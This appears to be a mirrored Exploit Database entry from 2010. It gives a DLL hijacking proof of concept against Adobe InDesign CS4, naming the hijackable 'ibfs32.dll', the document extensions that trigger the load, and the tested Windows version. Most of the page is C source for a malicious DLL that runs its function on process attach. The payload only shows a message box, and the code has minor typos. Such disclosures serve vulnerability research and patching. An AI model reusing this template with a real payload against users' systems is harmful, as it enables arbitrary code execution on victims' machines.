Adobe InDesign CS4 – ‘ibfs32.dll’ DLL Hijacking

• Exploit Database
• 10 阅读

• 作者： Glafkos Charalambous
  日期： 2010-08-25
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14775/

• /* 
  Exploit Title: Adobe InDesign CS4 DLL Hijacking Exploit (ibfs32.dll)
  Date: August 25, 2010
  Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
  Version: CS4 v6.0
  Tested on: Windows 7 x64 Ultimate
  Vulnerable extensions: .indl .indp .indt .inx
  Greetz: Astalavista, OffSEC, Exploit-DB
  */
  
  #include <windows.h>
  
  BOOL WINAPI DllMain (
  HANDLEhinstDLL,
  DWORD fdwReason,
  LPVOIDlpvReserved)
  {
  switch (fdwReason)
  	{
  	case DLL_PROCESS_ATTACH:
  		dll_hijack();
  	case DLL_THREAD_ATTACH:
  case DLL_THREAD_DETACH:
  case DLL_PROCESS_DETACH:
  	break;
  	}
  	return TRUE;
  }
  
  int dll_hijack()
  {
  MessageBox(0, "Adobe DLL Hijacking!", "DLL Message", MB_OK);
  }